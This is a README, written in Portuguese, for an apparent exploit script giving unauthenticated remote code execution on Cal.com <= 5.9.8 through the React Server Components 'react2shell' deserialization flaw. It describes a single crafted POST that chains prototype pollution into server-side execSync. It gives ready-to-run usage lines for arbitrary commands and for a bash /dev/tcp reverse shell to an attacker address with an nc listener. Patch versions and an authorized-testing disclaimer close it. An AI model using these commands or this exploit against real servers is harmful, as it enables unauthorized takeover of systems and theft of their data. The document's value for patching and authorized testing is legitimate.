
Execução remota de código sem autenticação no Cal.com <= 5.9.8 através da falha de desserialização "Flight" do React Server Components — "react2shell" (CVE-2025-55182 no React, CVE-2025-66478 no Next.js).
O Cal.com inclui um Next.js 15.x vulnerável. Um único POST / não autenticado, contendo um cabeçalho Next-Action e um payload Flight multipart elaborado, percorre uma cadeia de poluição de protótipo (__proto__:then + constructor:constructor) até um eval no lado do servidor, alcançando child_process.execSync. A saída do comando é retornada inline no campo digest do erro RSC. Sem autenticação, sem interação do usuário — uma única requisição é RCE.
<= 5.9.8 (Next.js 15.x / 16.x App Router com RSC)5.9.9 (atualiza o Next.js incluído)3000pip install requests
# one-off command (output comes back in the response)
python3 exploit.py http://10.10.10.10:3000/ -c 'id'
python3 exploit.py http://10.10.10.10:3000/ -c 'cat /root/proof.txt'
# interactive reverse shell (start `nc -lvnp 4444` first)
python3 exploit.py http://10.10.10.10:3000/ --shell 10.10.14.5:4444
O comando único retorna a sua saída inline através do digest do erro RSC. O modo --shell dispara uma reverse shell bash /dev/tcp destacada com setsid (o contêiner do alvo é Debian e inclui bash).
Atualize o Cal.com para >= 5.9.9 (qualquer Next.js corrigido: 15.0.5 / 15.1.9 / 15.2.6 / 15.3.6 / 15.4.8 / 15.5.7 / 16.0.7). Não exponha o manipulador de funções de servidor do RSC a clientes não confiáveis e não execute o contêiner do aplicativo como root.
Apenas para testes de segurança autorizados e fins educacionais. Use-o somente em sistemas que você possui ou para os quais tenha permissão explícita de teste.